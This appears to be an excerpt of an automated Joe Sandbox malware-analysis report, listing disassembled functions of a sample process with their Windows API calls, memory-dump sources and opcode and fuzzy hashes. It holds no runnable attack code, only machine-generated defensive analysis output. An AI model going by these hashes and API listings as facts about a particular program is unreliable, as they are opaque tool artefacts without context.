                                                                                        • Instruction Fuzzy Hash: 93411972A40209BADF21DAA0CC45FEF7BFDDF49710F0040AAFA00A71D2D6719D458765
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AF032B
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00AF0375
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                          • Part of subcall function 00AC09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AC09E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: b128cc9d69ad31daba4d0c28fb02a405418878ee133c2d205890177baa1bad60
                                                                                        • Instruction ID: 26c3122777fdc6ba6b6dc64739382371730c04df911dd581a6cef7e72e611604
                                                                                        • Opcode Fuzzy Hash: b128cc9d69ad31daba4d0c28fb02a405418878ee133c2d205890177baa1bad60
                                                                                        • Instruction Fuzzy Hash: 5B218472A002989BDF41DFD4C845BEE7BFCAF49304F10415AE504A7242DBB4598CDF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 46b857f49f4dae25f6952e320f879c04b01da663de07b51c2647c966df42ea2e
                                                                                        • Instruction ID: b5b381e7e0fc34e72374efb682d4654bd63d49abb41328970e53b459a4693d06
                                                                                        • Opcode Fuzzy Hash: 46b857f49f4dae25f6952e320f879c04b01da663de07b51c2647c966df42ea2e
                                                                                        • Instruction Fuzzy Hash: 53F148706083019FC714DF28C584AAABBE5FF89314F54896EF8999B391DB70E945CF82
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 640418fc4a4e66c69b5c6b29111438bdf5d8dbe1ef7e592f2621b39ae2d20bc5
                                                                                        • Instruction ID: 75872148bbd871b4a81d8fa564858bea2decdbd256578608605395dafd310d57
                                                                                        • Opcode Fuzzy Hash: 640418fc4a4e66c69b5c6b29111438bdf5d8dbe1ef7e592f2621b39ae2d20bc5
                                                                                        • Instruction Fuzzy Hash: 8261DE71600209EBDF048F29D991BAA7BB9FF44310F5581A9EC19CF296EB31D9A0CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC07EC
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC07F4
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC07FF
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC080A
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC0812
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC081A
                                                                                          • Part of subcall function 00ABFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AAAC6B), ref: 00ABFFA7
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AAAD08
                                                                                        • OleInitialize.OLE32(00000000), ref: 00AAAD85
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AE2F56
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1986988660-0
                                                                                        • Opcode ID: 9b8e7e205bb246a1b2abe2ac1cbb09ea0a129ca05e902e79df58edcdfe661653
                                                                                        • Instruction ID: 0b8b4160750ddb40ca28ef4acd2a1e1760ba107118d08feaae942662265a1a9d
                                                                                        • Opcode Fuzzy Hash: 9b8e7e205bb246a1b2abe2ac1cbb09ea0a129ca05e902e79df58edcdfe661653
                                                                                        • Instruction Fuzzy Hash: FD81ACB19A92408EC384EF39AD596657FE8FB5830C71082AAD419C73F2EFB84805CF55
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB59F9
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB5A9E
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB5ABB
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1505330794-0
                                                                                        • Opcode ID: d512004cc80b227f8e378c94ccbfbb2f8b90577102eed9c148a6aaab439b8ead
                                                                                        • Instruction ID: 0f997bc31106662d65bf21bb49310338295d1f569aa1a3e30bb6bd2959fd2701
                                                                                        • Opcode Fuzzy Hash: d512004cc80b227f8e378c94ccbfbb2f8b90577102eed9c148a6aaab439b8ead
                                                                                        • Instruction Fuzzy Hash: 2D3191709047018FD720DF34D898697BBF8AB49308F000A2EF59A93281DBB5A944CB51
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00AC5953
                                                                                          • Part of subcall function 00ACA39B: __NMSG_WRITE.LIBCMT ref: 00ACA3C2
                                                                                          • Part of subcall function 00ACA39B: __NMSG_WRITE.LIBCMT ref: 00ACA3CC
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00AC595A
                                                                                          • Part of subcall function 00ACA3F8: GetModuleFileNameW.KERNEL32(00000000,00B653BA,00000104,00000004,00000001,00AC1003), ref: 00ACA48A
                                                                                          • Part of subcall function 00ACA3F8: ___crtMessageBoxW.LIBCMT ref: 00ACA538
                                                                                          • Part of subcall function 00AC32CF: ___crtCorExitProcess.LIBCMT ref: 00AC32D5
                                                                                          • Part of subcall function 00AC32CF: ExitProcess.KERNEL32 ref: 00AC32DE
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        • RtlAllocateHeap.NTDLL(01110000,00000000,00000001,?,00000004,?,?,00AC1003,?), ref: 00AC597F
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: 3c0dc9cfa97445e11a7ab9514b0f68858a3d67818f502e445ce9ea643b3e6932
                                                                                        • Instruction ID: 28f464722fc9a66511c73cf0f418f798f9e9573d7f0f2290b4cef97767db2c22
                                                                                        • Opcode Fuzzy Hash: 3c0dc9cfa97445e11a7ab9514b0f68858a3d67818f502e445ce9ea643b3e6932
                                                                                        • Instruction Fuzzy Hash: D401F136701B16DBEA212B34AD12F2E3258DF62770F13056EF815AF2D1DEB4AD8047A1
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00B092D6
                                                                                          • Part of subcall function 00AC2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2F99
                                                                                          • Part of subcall function 00AC2F85: GetLastError.KERNEL32(00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2FAB
                                                                                        • _free.LIBCMT ref: 00B092E7
                                                                                        • _free.LIBCMT ref: 00B092F9
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                        • Instruction ID: a2f872ec899874b1987736d903a4f717c285e7c54018cb21099e5d1760d91966
                                                                                        • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                        • Instruction Fuzzy Hash: D3E05BB170570257CA24A5786E40FD37BFC8FC9755716055DB449D71C3CE24F85182B8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CALL
                                                                                        • API String ID: 0-4196123274
                                                                                        • Opcode ID: d6198c26c6f9892260293f12f838966dd27d3c20fd0c425d3fd6d215ad5ab816
                                                                                        • Instruction ID: 28635b9790d89414570629b19eea522ce1f1f2212042f872f26c7a15aa35f3ae
                                                                                        • Opcode Fuzzy Hash: d6198c26c6f9892260293f12f838966dd27d3c20fd0c425d3fd6d215ad5ab816
                                                                                        • Instruction Fuzzy Hash: 95322974508341DFDB24DF14C590A6ABBF1BF86304F19856DE8869B3A2D735EC85CB82
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 4104443479-3962188686
                                                                                        • Opcode ID: c49df36bc74941aa7594382e2ec1298352819abee958ea443dc7d47193117f79
                                                                                        • Instruction ID: e970e92fec0c83eb19ccba2dcb4b822bf6c7b92937cf4f48050d01040fabfd8d
                                                                                        • Opcode Fuzzy Hash: c49df36bc74941aa7594382e2ec1298352819abee958ea443dc7d47193117f79
                                                                                        • Instruction Fuzzy Hash: A2415D31A042985BEF219B94C951BFF7FB98B5D350F584075F982E7287D6318D8483E2
                                                                                        APIs
                                                                                        • _strcat.LIBCMT ref: 00B1E20C
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • _wcscpy.LIBCMT ref: 00B1E29B
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1012013722-0
                                                                                        • Opcode ID: b34f1cdbd492ba9d196597df8de63c3108e4270b373b5aa73d8d582893e9b22c
                                                                                        • Instruction ID: 92eb9fd481429eb59a44795904c967b414129f0c4e48edac97d93a9c08577ad5
                                                                                        • Opcode Fuzzy Hash: b34f1cdbd492ba9d196597df8de63c3108e4270b373b5aa73d8d582893e9b22c
                                                                                        • Instruction Fuzzy Hash: 19913835A00604DFCB19DF28D5819A9B7E5EF59310B95809AFC2A9F3A2DB30ED41CB84
                                                                                        APIs
                                                                                        • _memmove.LIBCMT ref: 00B068EC
                                                                                        • _memmove.LIBCMT ref: 00B0690A
                                                                                          • Part of subcall function 00B06A73: _memmove.LIBCMT ref: 00B06B01
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                        • Instruction ID: b36ab7f96842a2788fa56ab2128ab7b911279b8c1a93ada50237ae935b7cc9cc
                                                                                        • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                        • Instruction Fuzzy Hash: 9D71E2706006049FDB24AF14C885B6ABFE5EF99320F24C58DF8D52B2C2CB35AD61CB90
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B0614E
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID:
                                                                                        • API String ID: 2358735015-0
                                                                                        • Opcode ID: 366578e476b86e67fe9650d0d45a0b93c406625375ffc830c0be49c19767585e
                                                                                        • Instruction ID: 443a0fe62acf855c1bde449cefec12a22d0a070608ab08e0dba2c33bd528af85
                                                                                        • Opcode Fuzzy Hash: 366578e476b86e67fe9650d0d45a0b93c406625375ffc830c0be49c19767585e
                                                                                        • Instruction Fuzzy Hash: 8841B6B6A00209AFDB15DFA4C8919AEBBFCFF44350B10856EE516D7281EB30DE50CB50
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00AB5FEF
                                                                                          • Part of subcall function 00AC359C: __lock.LIBCMT ref: 00AC35A2
                                                                                          • Part of subcall function 00AC359C: DecodePointer.KERNEL32(00000001,?,00AB6004,00AF8892), ref: 00AC35AE
                                                                                          • Part of subcall function 00AC359C: EncodePointer.KERNEL32(?,?,00AB6004,00AF8892), ref: 00AC35B9
                                                                                          • Part of subcall function 00AB5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AB5F18
                                                                                          • Part of subcall function 00AB5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB5F2D
                                                                                          • Part of subcall function 00AB5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB526C
                                                                                          • Part of subcall function 00AB5240: IsDebuggerPresent.KERNEL32 ref: 00AB527E
                                                                                          • Part of subcall function 00AB5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AB52E6
                                                                                          • Part of subcall function 00AB5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00AB5366
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB602F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 1438897964-0
                                                                                        • Opcode ID: d3549bf27b6a279e6f5742be1390b72ee701db92e23ec0e591c377e858e6cd59
                                                                                        • Instruction ID: 052887769551bdfb9aff4fea4706c9bd1173741f45d1912e3a4b5f19c764146f
                                                                                        • Opcode Fuzzy Hash: d3549bf27b6a279e6f5742be1390b72ee701db92e23ec0e591c377e858e6cd59
                                                                                        • Instruction Fuzzy Hash: 501189718183059BC711EF79EE55A4ABBE8FF89714F008A1EF044872A2DFB49944CF92
                                                                                        APIs
                                                                                          • Part of subcall function 00AC593C: __FF_MSGBANNER.LIBCMT ref: 00AC5953
                                                                                          • Part of subcall function 00AC593C: __NMSG_WRITE.LIBCMT ref: 00AC595A
                                                                                          • Part of subcall function 00AC593C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,?,00000004,?,?,00AC1003,?), ref: 00AC597F
                                                                                        • std::exception::exception.LIBCMT ref: 00AC101C
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                          • Part of subcall function 00AC87CB: RaiseException.KERNEL32(?,?,?,00B5CAF8,?,?,?,?,?,00AC1036,?,00B5CAF8,?,00000001), ref: 00AC8820
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 30562a4101504faae809b5b1d1c16f2b18323c08016abdef71610826f5f8590c
                                                                                        • Instruction ID: 5e4ce7eec66b6ab8f4c8de0fc55177af28adb0fe5a59c9059e367028a2941aa3
                                                                                        • Opcode Fuzzy Hash: 30562a4101504faae809b5b1d1c16f2b18323c08016abdef71610826f5f8590c
                                                                                        • Instruction Fuzzy Hash: A4F0A93560421DB6CB20AB58ED15FDE7BECAF01710F6104ADF81496191DF719BC0C6D4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock_file_memset
                                                                                        • String ID:
                                                                                        • API String ID: 26237723-0
                                                                                        • Opcode ID: 825f8137eb7fea08b4d2ce2cced1e34e15be45d0e1b6d332bd9f5cd55f2e3be2
                                                                                        • Instruction ID: a6f51072753e00dcbd2a25f6685514a895fc7549a10e27cc8d0c4075c6650cc8
                                                                                        • Opcode Fuzzy Hash: 825f8137eb7fea08b4d2ce2cced1e34e15be45d0e1b6d332bd9f5cd55f2e3be2
                                                                                        • Instruction Fuzzy Hash: 54017175C00648EBCF11AF79CE01E9E7B61BF80360F1A811DB8241A1A1DB358A91EB91
                                                                                        APIs
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        • __lock_file.LIBCMT ref: 00AC560B
                                                                                          • Part of subcall function 00AC6E3E: __lock.LIBCMT ref: 00AC6E61
                                                                                        • __fclose_nolock.LIBCMT ref: 00AC5616
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 0a835709219d9f99429c38025a6af5a99af9078fea399495a8dd0e1b46bd1daa
                                                                                        • Instruction ID: d9bf13eb2925ce716b393276dfcedf4f602f3dac7ad1e06d3c807db7d77d1596
                                                                                        • Opcode Fuzzy Hash: 0a835709219d9f99429c38025a6af5a99af9078fea399495a8dd0e1b46bd1daa
                                                                                        • Instruction Fuzzy Hash: F2F09071D01B099ADB11AB798A02F6E67E1AF40331F17824DF424AB1C1CB7C69819F51
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00AC5EB4
                                                                                        • __ftell_nolock.LIBCMT ref: 00AC5EBF
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2999321469-0
                                                                                        • Opcode ID: 283d5176d318a73a9f4f6f5682c2f3e92d5131aed03d14d4c2b6a195d975568a
                                                                                        • Instruction ID: 0a3623c66e2c949b4c91d96103dea7cfb30ff4d9958702dd7da99a98911839d6
                                                                                        • Opcode Fuzzy Hash: 283d5176d318a73a9f4f6f5682c2f3e92d5131aed03d14d4c2b6a195d975568a
                                                                                        • Instruction Fuzzy Hash: 88F0A071D11A159ADB00BB798A02F5E76A07F01331F23424EB420AB1D2CFBC9E829B95
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB5AEF
                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AB5B1F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell__memset
                                                                                        • String ID:
                                                                                        • API String ID: 928536360-0
                                                                                        • Opcode ID: 406dd640a88fd0f11585aaa365721de0beabae4a01fd4e32af92e13594e820ef
                                                                                        • Instruction ID: 748227ebcc1c1c9a78b0d02dbb0416f1f892fe0e568ceea712d4154a3d47346a
                                                                                        • Opcode Fuzzy Hash: 406dd640a88fd0f11585aaa365721de0beabae4a01fd4e32af92e13594e820ef
                                                                                        • Instruction Fuzzy Hash: CEF0A7718183089FD7929B24DC45BD57BBC970130CF0001E9EA4897292DFB54B88CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString$__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 207118244-0
                                                                                        • Opcode ID: a5d1655d50c13511099f0c7a3d6c14d79e35a1abbfd1a188a10bf9be3a77ed84
                                                                                        • Instruction ID: 3178a5b1d507c98738fc84351ec0de2df95df128b26412d46d2afc5c46ab9723
                                                                                        • Opcode Fuzzy Hash: a5d1655d50c13511099f0c7a3d6c14d79e35a1abbfd1a188a10bf9be3a77ed84
                                                                                        • Instruction Fuzzy Hash: 76B16A35A4010AEFCF14DF94D8919EEBBB5FF58310F50815AF915AB291EB70AA81CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                        • Instruction ID: fe9e6e39a2125997a2c103634a94fbc1181b544d45a2b7f5e6262607f4b83a27
                                                                                        • Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                        • Instruction Fuzzy Hash: 366198706002069FDB10DF64C981B7BB7F9EF5A300F15856DE91A9B291E774ED80CB92
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                        • Instruction ID: f9470f4b7a9d83a3919b0ae075e89002c22a1a798e0f36c068fc00d04892f5c3
                                                                                        • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                        • Instruction Fuzzy Hash: EB31BE76204602DFCB24DF18D580A65F7A8FF08310714C66DE99A8B752DB30EC81CB84
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
